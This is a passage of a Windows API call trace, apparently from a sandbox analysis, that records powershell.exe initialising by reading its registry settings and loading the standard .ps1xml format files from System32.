	[0494.200] CoTaskMemAlloc (cb=0x5a) returned 0x1b837110
	[0494.200] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad51c, lpData=0x1b837110, lpcbData=0x1ad518*=0x56 | out: lpType=0x1ad51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad518*=0x56) returned 0x0
	[0494.200] CoTaskMemFree (pv=0x1b837110) 
	[0494.200] RegCloseKey (hKey=0x320) returned 0x0
	[0494.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0494.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0496.601] VirtualQuery (in: lpAddress=0x1ac2b0, lpBuffer=0x1ad170, dwLength=0x30 | out: lpBuffer=0x1ad170*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0497.425] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0497.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.426] CoTaskMemFree (pv=0x4344f0) 
	[0497.433] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad768 | out: phkResult=0x1ad768*=0x320) returned 0x0
	[0497.433] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ad77c, lpData=0x0, lpcbData=0x1ad778*=0x0 | out: lpType=0x1ad77c*=0x1, lpData=0x0, lpcbData=0x1ad778*=0x74) returned 0x0
	[0497.434] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ad6ec, lpData=0x0, lpcbData=0x1ad6e8*=0x0 | out: lpType=0x1ad6ec*=0x1, lpData=0x0, lpcbData=0x1ad6e8*=0x74) returned 0x0
	[0497.434] CoTaskMemAlloc (cb=0x78) returned 0x3f0370
	[0497.434] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ad6bc, lpData=0x3f0370, lpcbData=0x1ad6b8*=0x74 | out: lpType=0x1ad6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad6b8*=0x74) returned 0x0
	[0497.434] CoTaskMemFree (pv=0x3f0370) 
	[0497.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0497.434] SetErrorMode (uMode=0x1) returned 0x1
	[0497.434] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0497.434] SetErrorMode (uMode=0x1) returned 0x1
	[0497.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0497.436] SetErrorMode (uMode=0x1) returned 0x1
	[0497.436] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0497.436] SetErrorMode (uMode=0x1) returned 0x1
	[0497.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0497.436] SetErrorMode (uMode=0x1) returned 0x1
	[0497.436] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0497.436] SetErrorMode (uMode=0x1) returned 0x1
	[0497.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0497.436] SetErrorMode (uMode=0x1) returned 0x1
	[0497.436] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0497.436] SetErrorMode (uMode=0x1) returned 0x1
	[0497.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0497.437] SetErrorMode (uMode=0x1) returned 0x1
	[0497.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0497.437] SetErrorMode (uMode=0x1) returned 0x1
	[0497.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0497.437] SetErrorMode (uMode=0x1) returned 0x1
	[0497.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0497.437] SetErrorMode (uMode=0x1) returned 0x1
	[0497.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0497.437] SetErrorMode (uMode=0x1) returned 0x1
	[0497.438] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0497.438] SetErrorMode (uMode=0x1) returned 0x1
	[0497.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0497.438] SetErrorMode (uMode=0x1) returned 0x1
	[0497.438] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0497.438] SetErrorMode (uMode=0x1) returned 0x1
	[0497.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0497.438] SetErrorMode (uMode=0x1) returned 0x1
	[0497.438] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0497.439] SetErrorMode (uMode=0x1) returned 0x1
	[0497.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0497.439] SetErrorMode (uMode=0x1) returned 0x1
	[0497.439] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad640 | out: lpFileInformation=0x1ad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0497.439] SetErrorMode (uMode=0x1) returned 0x1
	[0497.440] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0497.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.440] CoTaskMemFree (pv=0x4344f0) 
	[0498.195] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0498.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0498.196] CoTaskMemFree (pv=0x4344f0) 
	[0498.198] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0498.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0498.198] CoTaskMemFree (pv=0x4344f0) 
	[0498.201] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0498.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0498.201] CoTaskMemFree (pv=0x4344f0) 
	[0498.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.203] SetErrorMode (uMode=0x1) returned 0x1
	[0498.203] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0498.203] GetFileType (hFile=0x2f8) returned 0x1
	[0498.203] SetErrorMode (uMode=0x1) returned 0x1
	[0498.203] GetFileType (hFile=0x2f8) returned 0x1
	[0498.203] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.205] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.206] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.206] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.206] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.207] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.207] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0498.207] ReadFile (in: hFile=0x2f8, lpBuffer=0x3449662, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3449662*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0498.207] ReadFile (in: hFile=0x2f8, lpBuffer=0x344a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x344a118*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0498.207] CloseHandle (hObject=0x2f8) returned 1
	[0498.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.207] SetErrorMode (uMode=0x1) returned 0x1
	[0498.208] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad280 | out: lpFileInformation=0x1ad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0498.208] SetErrorMode (uMode=0x1) returned 0x1
	[0498.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.208] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x2f8) returned 0x0
	[0498.208] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0498.208] CoTaskMemAlloc (cb=0x5a) returned 0x1b8371f0
	[0498.208] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x1b8371f0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0498.208] CoTaskMemFree (pv=0x1b8371f0) 
	[0498.208] RegCloseKey (hKey=0x2f8) returned 0x0
	[0498.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.212] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x226451ba, Data2=0x4acb, Data3=0x4d38, Data4=([0]=0x9a, [1]=0x9f, [2]=0xb4, [3]=0x4b, [4]=0xd7, [5]=0xe0, [6]=0x1c, [7]=0xa4))) returned 0x0
	[0498.216] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xfb49e256, Data2=0xd444, Data3=0x490e, Data4=([0]=0x88, [1]=0xd5, [2]=0x89, [3]=0x15, [4]=0x4d, [5]=0x27, [6]=0x22, [7]=0xe8))) returned 0x0
	[0498.218] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0498.218] GetFileType (hFile=0x2f8) returned 0x1
	[0498.218] SetErrorMode (uMode=0x1) returned 0x1
	[0498.218] GetFileType (hFile=0x2f8) returned 0x1
	[0498.219] ReadFile (in: hFile=0x2f8, lpBuffer=0x3474c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3474c80*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.220] ReadFile (in: hFile=0x2f8, lpBuffer=0x3474c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3474c80*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.220] ReadFile (in: hFile=0x2f8, lpBuffer=0x3474c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3474c80*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.829] ReadFile (in: hFile=0x2f8, lpBuffer=0x3474c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3474c80*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.829] ReadFile (in: hFile=0x2f8, lpBuffer=0x3474c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3474c80*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.830] ReadFile (in: hFile=0x2f8, lpBuffer=0x3474c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3474c80*, lpNumberOfBytesRead=0x1ad2d8*=0xfb2, lpOverlapped=0x0) returned 1
	[0498.830] ReadFile (in: hFile=0x2f8, lpBuffer=0x347439a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x347439a*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0498.830] ReadFile (in: hFile=0x2f8, lpBuffer=0x3474c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3474c80*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0498.831] CloseHandle (hObject=0x2f8) returned 1
	[0498.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0498.831] SetErrorMode (uMode=0x1) returned 0x1
	[0498.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad280 | out: lpFileInformation=0x1ad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0498.831] SetErrorMode (uMode=0x1) returned 0x1
	[0498.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0498.831] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x2f8) returned 0x0
	[0498.831] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0498.831] CoTaskMemAlloc (cb=0x5a) returned 0x1b8371f0
	[0498.832] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x1b8371f0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
